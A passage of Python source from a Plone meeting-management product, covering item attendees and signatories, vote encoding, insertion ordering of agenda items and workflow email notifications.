get_item_excused(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the excused for this item.\n Excused for an item are stored in the Meeting.item_excused dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_excused = meeting.get_item_excused().get(self.UID(), [])\n if ordered:\n meeting_item_excused = self._order_contacts(meeting_item_excused)\n if the_objects:\n item_excused = meeting._get_contacts(uids=meeting_item_excused, the_objects=the_objects)\n else:\n item_excused = tuple(meeting_item_excused)\n return item_excused\n\n security.declarePublic('get_item_non_attendees')\n\n def get_item_non_attendees(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the non_attendees for this item.\n Non attendees for an item are stored in the Meeting.item_non_attendees dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_non_attendees = meeting.get_item_non_attendees().get(self.UID(), [])\n if ordered:\n meeting_item_non_attendees = self._order_contacts(meeting_item_non_attendees)\n if the_objects:\n item_non_attendees = meeting._get_contacts(\n uids=meeting_item_non_attendees, the_objects=the_objects)\n else:\n item_non_attendees = tuple(meeting_item_non_attendees)\n return item_non_attendees\n\n security.declarePublic('get_item_signatories')\n\n def get_item_signatories(self,\n the_objects=False,\n by_signature_number=False,\n real=False,\n include_position_type=False,\n **kwargs):\n '''Returns the signatories for this item. If no signatory is defined,\n meeting signatories are returned.\n If p_theObjects=False, the returned result is an dict with\n signatory uid as key and 'signature_number' as value.\n Else, the key is the signatory contact object.\n '''\n signatories = {}\n if not self.hasMeeting():\n return signatories\n meeting = self.getMeeting()\n if not real:\n # we could have several signatories having same signature_number\n # this is the case when having a signatory replacer on some items\n # we may define for example 2 signatory \"2\" and use it on specific items\n signatories = meeting.get_signatories(by_signature_number=False)\n # keep signatories that are attendees for this item\n # keep order so we may have 2 signatory 2 present and the first win\n # we reverse attendees order so when reversing key/values here under\n # the second same signature numnber is actually the first\n attendees = reversed(self.get_attendees())\n signatories = OrderedDict([(k, signatories[k]) for k in attendees\n if k in signatories])\n # reverse as keys were signatory UID, we want signature_number\n signatories = {v: k for k, v in signatories.items()}\n\n item_signatories = meeting.get_item_signatories().get(self.UID(), {})\n signatories.update(item_signatories)\n\n if the_objects:\n uids = signatories.values()\n signatories_objs = meeting._get_contacts(uids=uids, the_objects=the_objects)\n reversed_signatories = {v: k for k, v in signatories.items()}\n signatories = {reversed_signatories[signatory.UID()]: signatory\n for signatory in signatories_objs}\n\n # finally if include_position_type=True, complete data\n if include_position_type:\n item_signatories = meeting.get_item_signatories(include_position_type=True).get(\n self.UID(), {})\n for signature_number, uid_or_obj in signatories.items():\n signatories[signature_number] = {\n 'hp': uid_or_obj,\n 'position_type': item_signatories[signature_number]['position_type']\n if signature_number in item_signatories else\n (uid_or_obj.position_type if the_objects else\n uuidToObject(uid_or_obj).position_type)}\n # finally change k/v if necessary\n if not by_signature_number:\n if not include_position_type:\n signatories = {v: k for k, v in signatories.items()}\n else:\n signatories = {v['hp']: {'signature_number': k, 'position_type': v['position_type']}\n for k, v in signatories.items()}\n\n return signatories\n\n def get_votes_are_secret(self):\n \"\"\" \"\"\"\n return bool(self.getPollType().startswith('secret'))\n\n def get_vote_is_secret(self, vote_number):\n \"\"\" \"\"\"\n item_votes = self.getMeeting().get_item_votes().get(self.UID(), [])\n if len(item_votes) - 1 >= vote_number:\n poll_type = item_votes[vote_number].get('poll_type', self.getPollType())\n else:\n poll_type = self.getPollType()\n return poll_type.startswith('secret')\n\n def _build_unexisting_vote(self,\n is_secret,\n vote_number,\n poll_type,\n voter_uids=[],\n include_extra_infos=True):\n \"\"\" \"\"\"\n if is_secret:\n votes = [{'label': None,\n 'votes': {},\n 'linked_to_previous': vote_number != 0 and self.REQUEST.get(\n 'form.widgets.linked_to_previous', False) or False}]\n if include_extra_infos:\n votes[0]['vote_number'] = 0\n votes[0]['poll_type'] = poll_type\n # define vote_value = '' for every used vote values\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for used_vote in cfg.getUsedVoteValues():\n votes[0]['votes'][used_vote] = 0\n else:\n votes = [\n {\n 'label': None,\n 'voters': {},\n 'linked_to_previous': vote_number != 0 and self.REQUEST.get(\n 'form.widgets.linked_to_previous', False) or False}]\n if include_extra_infos:\n votes[0]['vote_number'] = 0\n votes[0]['poll_type'] = poll_type\n # define vote not encoded for every voters\n for voter_uid in voter_uids:\n votes[0]['voters'][voter_uid] = NOT_ENCODED_VOTE_VALUE\n return votes\n\n security.declarePublic('get_item_votes')\n\n def get_item_votes(self,\n vote_number='all',\n include_extra_infos=True,\n include_unexisting=True,\n unexisting_value=NOT_ENCODED_VOTE_VALUE,\n ignored_vote_values=[],\n force_list_result=False):\n '''p_vote_number may be 'all' (default), return a list of every votes,\n or an integer like 0, returns the vote with given number.\n If p_include_extra_infos, for convenience, some extra infos are added\n 'vote_number', 'linked_to_previous' and 'poll_type'\n is added to the returned value.\n If p_include_unexisting, will return p_unexisting_value for votes that\n does not exist, so when votes just enabled, new voter selected, ...'''\n votes = []\n if not self.hasMeeting():\n return votes\n meeting = self.getMeeting()\n item_votes = meeting.get_item_votes().get(self.UID(), [])\n voter_uids = self.get_item_voters()\n poll_type = self.getPollType()\n # all votes\n if vote_number == 'all':\n # votes will be a list\n votes = deepcopy(item_votes)\n if include_extra_infos:\n # add a 'vote_number' key into the result for convenience\n i = 0\n for vote_infos in votes:\n vote_infos['vote_number'] = i\n vote_infos['linked_to_previous'] = vote_infos.get('linked_to_previous', False)\n vote_infos['poll_type'] = vote_infos.get('poll_type', poll_type)\n i += 1\n # vote_number\n elif len(item_votes) - 1 >= vote_number:\n votes.append(item_votes[vote_number])\n\n # secret votes\n if self.get_vote_is_secret(vote_number):\n if include_unexisting and not votes:\n votes = self._build_unexisting_vote(True, vote_number, poll_type)\n # public votes\n else:\n # add an empty vote in case nothing in itemVotes\n # this is useful when no votes encoded, new voters selected, ...\n if include_unexisting:\n # first or not existing\n if not votes:\n votes = self._build_unexisting_vote(False, vote_number, poll_type)\n\n i = 0 if vote_number == 'all' else vote_number\n for vote in votes:\n if not self.get_vote_is_secret(i):\n # add new values if some voters were added\n stored_voter_uids = vote['voters'].keys()\n for voter_uid in voter_uids:\n if voter_uid not in stored_voter_uids:\n vote['voters'][voter_uid] = NOT_ENCODED_VOTE_VALUE\n # make sure we only have current voters in 'voters'\n # this could not be the case when encoding votes\n # for a voter then setting him absent\n # discard also ignored_vote_values\n vote['voters'] = OrderedDict(\n [(vote_voter_uid, vote['voters'][vote_voter_uid])\n for vote_voter_uid in voter_uids\n if (not ignored_vote_values or\n vote['voters'][vote_voter_uid] not in ignored_vote_values)])\n i = i + 1\n\n # when asking a vote_number, only return this one as a dict, not as a list\n if votes and vote_number != 'all' and not force_list_result:\n votes = votes[0]\n return votes\n\n def get_voted_voters(self, vote_number='all'):\n '''Voter uids that actually voted on this item, relevant for public votes.'''\n item_votes = self.get_item_votes(\n vote_number=vote_number,\n ignored_vote_values=[NOT_ENCODED_VOTE_VALUE],\n force_list_result=True)\n voted_voters = []\n for vote in item_votes:\n voters = vote.get('voters', {}).keys()\n voted_voters += voters\n return tuple(set(voted_voters))\n\n security.declarePublic('get_item_voters')\n\n def get_item_voters(self, theObjects=False):\n '''Return held positions able to vote on current item.\n By default, held_position UIDs are returned.\n If p_theObjects=True, held_position objects are returned.'''\n meeting = self.getMeeting()\n attendee_uids = self.get_attendees() or None\n voters = meeting.get_voters(uids=attendee_uids, the_objects=theObjects)\n return voters\n\n def _voteIsDeletable(self, vote_number):\n \"\"\" \"\"\"\n res = False\n item_votes = self.getMeeting().get_item_votes().get(self.UID())\n if item_votes:\n vote_infos = item_votes[vote_number]\n if vote_infos['linked_to_previous'] or \\\n not next_vote_is_linked(item_votes, vote_number):\n res = True\n return res\n\n def get_in_and_out_attendees(self, ignore_before_first_item=True, the_objects=True):\n \"\"\"Returns a dict with informations about assembly moves :\n - who left at the beginning of the item;\n - who entered at the beginning of the item;\n - who left at the end of the item;\n - who entered at the end of the item.\n \"\"\"\n res = {'left_before': (),\n 'entered_before': (),\n 'left_after': (),\n 'entered_after': (),\n 'non_attendee_before': (),\n 'attendee_again_before': (),\n 'non_attendee_after': (),\n 'attendee_again_after': ()}\n meeting = self.getMeeting()\n if meeting:\n items = meeting.get_items(ordered=True, unrestricted=True)\n item_index = items.index(self)\n previous = None\n # only fill a value if attendee present for current item\n # this manage fact that an attendee may be absent for an item,\n # then not attendee for next item\n attendees = self.get_attendees(the_objects=the_objects)\n absents = self.get_item_absents(the_objects=the_objects)\n excused = self.get_item_excused(the_objects=the_objects)\n non_attendees = self.get_item_non_attendees(the_objects=the_objects)\n if item_index:\n previous = items[item_index - 1]\n # before absents/excused\n previous_attendees = previous.get_attendees(the_objects=the_objects)\n previous_absents = previous.get_item_absents(the_objects=the_objects)\n previous_excused = previous.get_item_excused(the_objects=the_objects)\n left_before = tuple(set(absents + excused).intersection(\n set(previous_attendees)))\n entered_before = tuple(set(previous_absents + previous_excused).intersection(\n set(attendees)))\n res['left_before'] = left_before\n res['entered_before'] = entered_before\n # non attendees\n previous_non_attendees = previous.get_item_non_attendees(the_objects=the_objects)\n non_attendee_before = tuple(set(non_attendees).intersection(\n set(previous_attendees)))\n attendee_again_before = tuple(set(previous_non_attendees).intersection(\n set(attendees)))\n res['non_attendee_before'] = non_attendee_before\n res['attendee_again_before'] = attendee_again_before\n elif not ignore_before_first_item:\n # self is first item\n res['left_before'] = absents + excused\n res['non_attendee_before'] = non_attendees\n next = None\n if self != items[-1]:\n next = items[item_index + 1]\n # after absents/excused\n next_attendees = next.get_attendees(the_objects=the_objects)\n next_absents = next.get_item_absents(the_objects=the_objects)\n next_excused = next.get_item_excused(the_objects=the_objects)\n next_non_attendees = next.get_item_non_attendees(the_objects=the_objects)\n left_after = tuple(set(next_excused + next_absents).intersection(\n set(attendees)))\n entered_after = tuple(set(excused + absents).intersection(\n set(next_attendees)))\n res['left_after'] = left_after\n res['entered_after'] = entered_after\n # non attendees\n non_attendee_after = tuple(set(attendees).intersection(\n set(next_non_attendees)))\n attendee_again_after = tuple(set(next_attendees).intersection(\n set(non_attendees)))\n res['non_attendee_after'] = non_attendee_after\n res['attendee_again_after'] = attendee_again_after\n return res\n\n security.declarePublic('mustShowItemReference')\n\n def mustShowItemReference(self):\n '''See doc in interfaces.py'''\n res = False\n item = self.getSelf()\n meeting = item.getMeeting()\n tool = api.portal.get_tool('portal_plonemeeting')\n if meeting and item.getMeeting().is_late():\n res = True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n res = cfg.getComputeItemReferenceForItemsOutOfMeeting()\n return res\n\n security.declarePrivate('addRecurringItemToMeeting')\n\n def addRecurringItemToMeeting(self, meeting):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n wfTool = api.portal.get_tool('portal_workflow')\n tool = api.portal.get_tool('portal_plonemeeting')\n try:\n item.REQUEST.set('PUBLISHED', meeting)\n item.isRecurringItem = True\n # we use the wf path defined in the cfg.getTransitionsForPresentingAnItem\n # to present the item to the meeting\n cfg = tool.getMeetingConfig(item)\n # give 'Manager' role to current user to bypass transitions guard\n # and avoid permission problems when transitions are triggered\n with api.env.adopt_roles(['Manager', ]):\n # try to bypass by using the \"validate\" shortcut\n trs = cfg.getTransitionsForPresentingAnItem(\n org_uid=item.getProposingGroup())\n if \"validate\" in get_transitions(item):\n wfTool.doActionFor(item, \"validate\")\n trs = [\"present\"]\n for tr in trs:\n if tr in get_transitions(item):\n wfTool.doActionFor(item, tr)\n # the item must be at least presented to a meeting, either we raise\n if not item.hasMeeting():\n raise WorkflowException\n del item.isRecurringItem\n except WorkflowException as wfe:\n msg = REC_ITEM_ERROR % (item.id, tr, str(wfe) or repr(wfe))\n logger.warn(msg)\n api.portal.show_message(msg, request=item.REQUEST, type='error')\n sendMail(None, item, 'recurringItemWorkflowError')\n unrestrictedRemoveGivenObject(item)\n return True\n\n def _bypass_meeting_closed_check_for(self, fieldName):\n \"\"\"See docstring in interfaces.py\"\"\"\n if fieldName in ['internalNotes', 'marginalNotes']:\n return True\n\n security.declarePublic('mayQuickEdit')\n\n def mayQuickEdit(self,\n fieldName,\n bypassWritePermissionCheck=False,\n onlyForManagers=False,\n bypassMeetingClosedCheck=False,\n raiseOnError=False):\n '''Check if the current p_fieldName can be quick edited thru the meetingitem_view.\n By default, an item can be quickedited if the field condition is True (field is used,\n current user is Manager, current item is linekd to a meeting) and if the meeting\n the item is presented in is not considered as 'closed'. Bypass if current user is\n a real Manager (Site Administrator/Manager).\n If p_bypassWritePermissionCheck is True, we will not check for write_permission.\n If p_bypassMeetingClosedCheck is True, we will not check if meeting is closed but\n only for permission and condition.'''\n field = self.Schema()[fieldName]\n # some fields are still editable even when meeting closed\n bypassMeetingClosedCheck = bypassMeetingClosedCheck or \\\n self.adapted()._bypass_meeting_closed_check_for(fieldName)\n res = checkMayQuickEdit(\n self,\n bypassWritePermissionCheck=bypassWritePermissionCheck,\n permission=field.write_permission,\n expression=self.Schema()[fieldName].widget.condition,\n onlyForManagers=onlyForManagers,\n bypassMeetingClosedCheck=bypassMeetingClosedCheck)\n if not res and raiseOnError:\n raise Unauthorized\n return res\n\n def mayQuickEditItemAssembly(self):\n \"\"\"Show edit icon if itemAssembly or itemAssemblyGuests field editable.\"\"\"\n return self.mayQuickEdit('itemAssembly', bypassWritePermissionCheck=True, onlyForManagers=True) or \\\n self.mayQuickEdit('itemAssemblyGuests', bypassWritePermissionCheck=True, onlyForManagers=True)\n\n def mayQuickEditItemSignatures(self):\n \"\"\"Show edit icon if itemSignatures field editable.\"\"\"\n return self.mayQuickEdit('itemSignatures', bypassWritePermissionCheck=True, onlyForManagers=True)\n\n security.declareProtected(ModifyPortalContent, 'onEdit')\n\n def onEdit(self, isCreated):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('getCustomAdviceMessageFor')\n\n def getCustomAdviceMessageFor(self, advice):\n '''See doc in interfaces.py.'''\n return {'displayDefaultComplementaryMessage': True,\n 'displayAdviceReviewState': False,\n 'customAdviceMessage': None}\n\n def _getInsertOrder(self, cfg):\n '''When inserting an item into a meeting, several \"methods\" are\n available (follow category order, proposing group order, all groups order,\n at the end, etc). If you want to implement your own \"method\", you may want\n to propose an alternative behaviour here, by returning an \"order\",\n or \"weight\" (as an integer value) that you assign to the current item.\n According to this \"order\", the item will be inserted at the right place.\n This method receives the p_cfg.\n '''\n res = []\n item = self.getSelf()\n\n insertMethods = cfg.getInsertingMethodsOnAddItem()\n for insertMethod in insertMethods:\n order = item._findOrderFor(insertMethod['insertingMethod'])\n if insertMethod['reverse'] == '1':\n order = - order\n res.append(order)\n return res\n\n def _findOrderFor(self, insertMethod):\n '''\n Find the order of given p_insertMethod.\n '''\n res = None\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if insertMethod == 'on_list_type':\n listTypes = cfg.getListTypes()\n keptListTypes = [listType['identifier'] for listType in listTypes\n if listType['used_in_inserting_method'] == '1']\n currentListType = self.getListType()\n # if it is not a listType used in the inserting_method\n # return 0 so elements using this listType will always have\n # a lower index and will be passed\n if currentListType not in keptListTypes:\n res = 0\n else:\n res = keptListTypes.index(currentListType) + 1\n elif insertMethod == 'on_categories':\n # get the categories order, pass onlySelectable to False so disabled categories\n # are taken into account also, so we avoid problems with freshly disabled categories\n # or when a category is restricted to a group a MeetingManager is not member of\n res = 1\n category = self.getCategory(True)\n if category:\n res = category.get_order(only_selectable=False)\n elif insertMethod == 'on_classifiers':\n # get the classifiers order, pass onlySelectable to False so disabled classifiers\n # are taken into account also, so we avoid problems with freshly disabled classifiers\n # or when a classifier is restricted to a group a MeetingManager is not member of\n res = 1\n classifier = self.getClassifier(True)\n if classifier:\n res = classifier.get_order(only_selectable=False)\n elif insertMethod == 'on_proposing_groups':\n org = self.getProposingGroup(True)\n res = org.get_order()\n elif insertMethod == 'on_all_groups':\n org = self.getProposingGroup(True)\n res = org.get_order(associated_org_uids=self.getAssociatedGroups(), cfg=cfg)\n elif insertMethod == 'on_groups_in_charge':\n res = self._computeOrderOnGroupsInCharge(cfg)\n elif insertMethod == 'on_all_associated_groups':\n res = self._computeOrderOnAllAssociatedGroups(cfg)\n elif insertMethod == 'on_all_committees':\n res = self._computeOrderOnAllCommittees(cfg)\n elif insertMethod == 'on_privacy':\n privacy = self.getPrivacy()\n privacies = cfg.getSelectablePrivacies()\n # Get the order of the privacy\n res = privacies.index(privacy)\n elif insertMethod == 'on_to_discuss':\n if self.getToDiscuss():\n res = 0\n else:\n res = 1\n elif insertMethod == 'on_other_mc_to_clone_to':\n toCloneTo = self.getOtherMeetingConfigsClonableTo()\n values = get_vocab_values(\n self,\n 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n if not toCloneTo:\n res = len(values) + 1\n else:\n res = values.index(toCloneTo[0])\n elif insertMethod == 'on_poll_type':\n pollType = self.getPollType()\n factory = queryUtility(IVocabularyFactory,\n 'Products.PloneMeeting.vocabularies.polltypesvocabulary')\n pollTypes = [term.token for term in factory(self)._terms]\n # Get the order of the pollType\n res = pollTypes.index(pollType)\n elif insertMethod == 'on_item_title':\n res = normalize(safe_unicode(self.Title()))\n elif insertMethod == 'on_item_decision_first_words':\n decision = safe_unicode(self.getDecision(mimetype='text/plain')).strip()\n decision = decision.split(' ')[0:INSERTING_ON_ITEM_DECISION_FIRST_WORDS_NB]\n decision = ' '.join(decision)\n res = normalize(safe_unicode(decision))\n elif insertMethod == 'on_item_creator':\n creator_fullname = safe_unicode(tool.getUserName(self.Creator()))\n res = normalize(creator_fullname)\n else:\n res = self.adapted()._findCustomOrderFor(insertMethod)\n return res\n\n def _sort_pre_orders(self, pre_orders):\n \"\"\"Sort given pre_orders and compute final index.\"\"\"\n pre_orders.sort()\n res = float(0)\n divisor = 1\n for pre_order in pre_orders:\n res += (float(pre_order) / divisor)\n # we may manage up to 1000 different values\n divisor *= 1000\n return res\n\n def _computeOrderOnAllAssociatedGroups(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_all_associated_groups'.'''\n associatedGroups = self.getAssociatedGroups()\n # computing will generate following order :\n # items having no associated groups\n # items having associated group 1 only\n # items having associated group 1 and associated group 2\n # items having associated group 1 and associated group 2 and associated group 3\n # items having associated group 1 and associated group 2 and associated group 3 and associated group 4\n # items having associated group 1 and associated group 3\n # items having associated group 1 and associated group 3 and associated group 4\n # for order, rely on order defined in MeetingConfig if defined, else use organization order\n orderedAssociatedOrgs = cfg.getOrderedAssociatedOrganizations()\n # if order changed in config, we keep it, do not rely on order defined on item\n pre_orders = []\n for associatedGroup in associatedGroups:\n if orderedAssociatedOrgs:\n try:\n index = orderedAssociatedOrgs.index(associatedGroup)\n pre_orders.append(index + 1)\n except ValueError:\n pre_orders.append(0)\n else:\n org = get_organization(associatedGroup)\n pre_orders.append(org.get_order())\n return self._sort_pre_orders(pre_orders)\n\n def _computeOrderOnAllCommittees(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_all_committees'.'''\n committees = self.getCommittees()\n # computing will generate following order :\n # items having no committee\n # items having committee 1 only\n # items having committee 1 and committee 2\n # items having committee 1 and committee 2 and committee 3\n # items having committee 1 and committee 2 and committee 3 and committee 4\n # items having committee 1 and committee 3\n # items having committee 1 and committee 3 and committee 4\n # for order, rely on order defined in MeetingConfig.committees DataGridField\n ordered_committees = self.getField('committees').Vocabulary(self).keys()\n # if order changed in config, we keep it, do not rely on order defined on item\n pre_orders = []\n for committee in committees:\n try:\n index = ordered_committees.index(committee)\n pre_orders.append(index + 1)\n except ValueError:\n pre_orders.append(0)\n return self._sort_pre_orders(pre_orders)\n\n def _computeOrderOnGroupsInCharge(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_groups_in_charge'.'''\n groups_in_charge = self.getGroupsInCharge(includeAuto=True)\n # computing will generate following order :\n # items having no groups in charge\n # items having group in charge 1 only\n # items having group in charge 1 and group in charge 2\n # items having group in charge 1 and group in charge 2 and group in charge 3\n # items having group in charge 1 and group in charge 2 and group in charge 3 and group in charge 4\n # items having group in charge 1 and group in charge 3\n # items having group in charge 1 and group in charge 3 and group in charge 4\n # for order, rely on order defined in MeetingConfig if defined, else use organization order\n orderedGroupsInCharge = cfg.getOrderedGroupsInCharge()\n # if order changed in config, we keep it, do not rely on order defined on item\n pre_orders = []\n for group_in_charge in groups_in_charge:\n if orderedGroupsInCharge:\n try:\n index = orderedGroupsInCharge.index(group_in_charge)\n pre_orders.append(index + 1)\n except ValueError:\n pre_orders.append(0)\n else:\n org = get_organization(group_in_charge)\n pre_orders.append(org.get_order())\n return self._sort_pre_orders(pre_orders)\n\n def _findCustomOrderFor(self, insertMethod):\n '''\n Adaptable method when defining our own insertMethod.\n This is made to be overrided.\n '''\n raise NotImplementedError\n\n def sendStateDependingMailIfRelevant(self, old_review_state, transition_id, new_review_state):\n \"\"\"Send notifications that depends on old/new review_state.\"\"\"\n self._sendAdviceToGiveMailIfRelevant(old_review_state, new_review_state)\n self._sendCopyGroupsMailIfRelevant(old_review_state, new_review_state)\n # send e-mail to group suffix\n # both notitifications may be enabled in configuration to manage when item\n # back to itemcreated from presented (when using WFA\n # presented_item_back_to_itemcreated), in this case the history_aware\n # notification is not sent but the group_suffix notification will be\n if not self._send_history_aware_mail_if_relevant(\n old_review_state, transition_id, new_review_state):\n self._send_proposing_group_suffix_if_relevant(\n old_review_state, transition_id, new_review_state)\n\n def _sendAdviceToGiveMailIfRelevant(self,\n old_review_state,\n new_review_state,\n force_resend_if_in_advice_review_states=False,\n debug=False):\n '''A transition was fired on self, check if, in the new item state,\n advices need to be given, that had not to be given in the previous item state.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if 'adviceToGive' not in cfg.getMailItemEvents() and \\\n 'adviceToGiveByUser' not in cfg.getMailItemEvents():\n return\n plone_group_ids = []\n plone_user_ids = []\n for org_uid, adviceInfo in self.adviceIndex.iteritems():\n # call hook '_sendAdviceToGiveToGroup' to be able to bypass\n # send of this notification to some defined groups\n if not self.adapted()._sendAdviceToGiveToGroup(org_uid):\n continue\n adviceStates = cfg.getItemAdviceStatesForOrg(org_uid)\n # If force_resend_if_in_review_states=True,\n # check if current item review_state in adviceStates\n # This is useful when asking advice again and\n # item review_state does not change\n # Ignore advices that must not be given in the current item state\n # Ignore advices that already needed to be given in the previous item state\n if (new_review_state not in adviceStates or old_review_state in adviceStates) and \\\n (not force_resend_if_in_advice_review_states or old_review_state not in adviceStates):\n continue\n\n # do not consider groups that already gave their advice\n if adviceInfo['type'] not in ['not_given', 'asked_again']:\n continue\n\n # notify entire advisers groups any time\n plone_group_id = get_plone_group_id(org_uid, 'advisers')\n if 'adviceToGive' in cfg.getMailItemEvents():\n plone_group_ids.append(plone_group_id)\n else:\n # adviceToGiveByUser\n # notify userids if any or the entire _advisers group\n if adviceInfo['userids']:\n plone_user_ids += adviceInfo['userids']\n else:\n plone_group = api.group.get(plone_group_id)\n plone_user_ids += plone_group.getMemberIds()\n\n # send mail\n if plone_group_ids:\n params = {\"obj\": self,\n \"event\": \"adviceToGive\",\n \"value\": plone_group_ids,\n \"isGroupIds\": True,\n \"debug\": debug}\n return sendMailIfRelevant(**params)\n elif plone_user_ids:\n params = {\"obj\": self,\n \"event\": \"adviceToGiveByUser\",\n \"value\": plone_user_ids,\n \"isUserIds\": True,\n \"debug\": debug}\n return sendMailIfRelevant(**params)\n\n def _sendAdviceToGiveToGroup(self, org_uid):\n \"\"\"See docstring in interfaces.py\"\"\"\n return True\n\n def _sendCopyGroupsMailIfRelevant(self, old_review_state, new_review_state):\n '''A transition was fired on self, check if, in the new item state,\n copy groups have now access to the item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if 'copyGroups' not in cfg.getMailItemEvents():\n return\n\n copyGroupsStates = cfg.getItemCopyGroupsStates()\n # Ignore if current state not in copyGroupsStates\n # Ignore if copyGroups had already access in previous state\n if new_review_state not in copyGroupsStates or old_review_state in copyGroupsStates:\n return\n # Send a mail to every person from getAllCopyGroups\n plone_group_ids = []\n for plone_group_id in self.getAllCopyGroups(auto_real_plone_group_ids=True):\n # call hook '_sendCopyGroupsToGroup' to be able to bypass\n # send of this notification to some defined groups\n if not self.adapted()._sendCopyGroupsToGroup(plone_group_id):\n continue\n plone_group_ids.append(plone_group_id)\n if plone_group_ids:\n return sendMailIfRelevant(self, 'copyGroups', plone_group_ids, isGroupIds=True)\n\n def _sendCopyGroupsToGroup(self, groupId):\n \"\"\"See docstring in interfaces.py\"\"\"\n return True\n\n def _get_proposing_group_suffix_notified_user_ids_for_review_state(\n self,\n review_state,\n excepted_manager=True\n ):\n \"\"\"\n Get all notified members ids of the proposing group suffix for a given 'review_state'\n If 'excepted_manager' is True we omit the manager(s).\n \"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n suffix_notified = cfg.getItemWFValidationLevels(states=[review_state])[\"suffix\"]\n plone_group_id_notified = get_plone_group_id(self.getProposingGroup(), suffix_notified)\n plone_group_notified = api.group.get(plone_group_id_notified)\n\n notified_user_ids = []\n if not excepted_manager:\n notified_user_ids = plone_group_notified.getMemberIds()\n else:\n for member in plone_group_notified.getGroupMembers():\n user_roles = member.getRolesInContext(self)\n if 'MeetingManager' not in user_roles:\n notified_user_ids.append(member.getId())\n return notified_user_ids\n\n def _send_proposing_group_suffix_if_relevant(\n self,\n old_review_state,\n transition_id,\n new_review_state):\n \"\"\"\n Notify by mail the proposing group suffix that will take care of this item in 'new_review_state'\n \"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n mail_event_id = \"item_state_changed_{}__proposing_group_suffix\".format(transition_id)\n is_notify_pg_suffix = mail_event_id in cfg.getMailItemEvents()\n mail_event_id_except_manager = mail_event_id + \"_except_manager\"\n is_notify_pg_suffix_excepted_manager = mail_event_id_except_manager in cfg.getMailItemEvents()\n\n if not is_notify_pg_suffix and not is_notify_pg_suffix_excepted_manager:\n return\n\n notified_user_ids = self._get_proposing_group_suffix_notified_user_ids_for_review_state(\n new_review_state,\n is_notify_pg_suffix_excepted_manager\n )\n if is_notify_pg_suffix:\n return sendMailIfRelevant(self, mail_event_id, notified_user_ids, isUserIds=True)\n else:\n return sendMailIfRelevant(self, mail_event_id_except_manager, notified_user_ids, isUserIds=True)\n\n def _send_history_aware_mail_if_relevant(self, old_review_state, transition_id, new_review_state):\n \"\"\"\n Notify by mail one specific user (if possible) based on the item history.\n For \"up\" transition, we will notify the user that made the precedent 'back_transition'\n to 'old_review_state'.\n If it is the first time the item goes to 'new_review_state',\n we notify the proposing group suffix (except manager) because we can't predict the future.\n For \"down\" transition, we will notify the user that made the precedent 'leading_transition'\n to 'old_review_state'.\n \"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n mail_event_id = \"item_state_changed_{}__history_aware\".format(transition_id)\n # we only consider the item validation process, if old_review_state is\n # outside, like for example when using the 'presented_item_back_to_itemcreated'\n # WFAdaptation, we bypass\n if mail_event_id not in cfg.getMailItemEvents() or \\\n old_review_state not in cfg.getItemWFValidationLevels(data=\"state\") + [\"validated\"]:\n return\n\n wf_direction = down_or_up_wf(self)\n notified_user_ids = []\n if wf_direction == \"up\":\n # We are going up (again) so we will notify the user that made any transition\n # after the last p_transition_id\n wf_action_to_find = cfg.getItemWFValidationLevels(states=[old_review_state])[\n \"back_transition\"]\n wf_action = getLastWFAction(self, wf_action_to_find)\n if wf_action: # In case WF definition has changed in the meantime\n notified_user_ids = [wf_action[\"actor\"]]\n elif wf_direction == \"down\":\n # We are going down so we will notify the user that made the precedent 'leading_transition'\n # to the 'old_review_state'\n wf_action_to_find = cfg.getItemWFValidationLevels(states=[old_review_state])\n if wf_action_to_find:\n wf_action_to_find = wf_action_to_find[\"leading_transition\"]\n elif old_review_state == \"validated\":\n # special management when going down from \"validated\"\n # as this information is not in the \"itemWFValidationLevels\"\n # but we now that the leading_transition is always \"validate\"\n wf_action_to_find = \"validate\"\n else:\n raise Exception(\"Unable to find leading transition!\")\n\n wf_action = getLastWFAction(self, wf_action_to_find)\n if wf_action: # In case WF definition has changed in the meantime\n notified_user_ids = [wf_action[\"actor\"]]\n else:\n # We can't predict who will take care of the item after the transition so we notify\n # the proposing group\n notified_user_ids = self._get_proposing_group_suffix_notified_user_ids_for_review_state(\n new_review_state\n )\n\n return sendMailIfRelevant(self, mail_event_id, notified_user_ids, isUserIds=True)\n\n security.declarePublic('sendAdviceDelayWarningMailIfRelevant')\n\n def sendAdviceDelayWarningMailIfRelevant(self, group_id, old_adviceIndex):\n ''' '''\n def _delay_in_alert(adviceInfo, old_adviceInfo):\n \"\"\" \"\"\"\n left_delay = adviceInfo['delay_infos']['left_delay']\n old_left_delay = old_adviceInfo['delay_infos']['left_delay']\n delay_left_alert = adviceInfo['delay_left_alert']\n return (left_delay != old_left_delay) and \\\n (delay_left_alert.isdigit() and\n left_delay >= -1 and\n left_delay <= int(delay_left_alert))\n\n def _just_timed_out(adviceInfo, old_adviceInfo):\n \"\"\" \"\"\"\n return adviceInfo['delay_infos']['delay_status'] == 'timed_out' and \\\n not old_adviceInfo['delay_infos']['delay_status'] == 'timed_out'\n\n # now that new delay is computed, check if we need to send an email notification\n # only notify one time, when 'left_delay' changed and if it is <= 'delay_left_alert'\n # when _updateAdvices is called several times, delay_infos could not exist in old_adviceIndex\n adviceInfo = self.adviceIndex[group_id]\n # first time group_id is added to adviceIndex, it does not exist in old_adviceIndex\n old_adviceInfo = 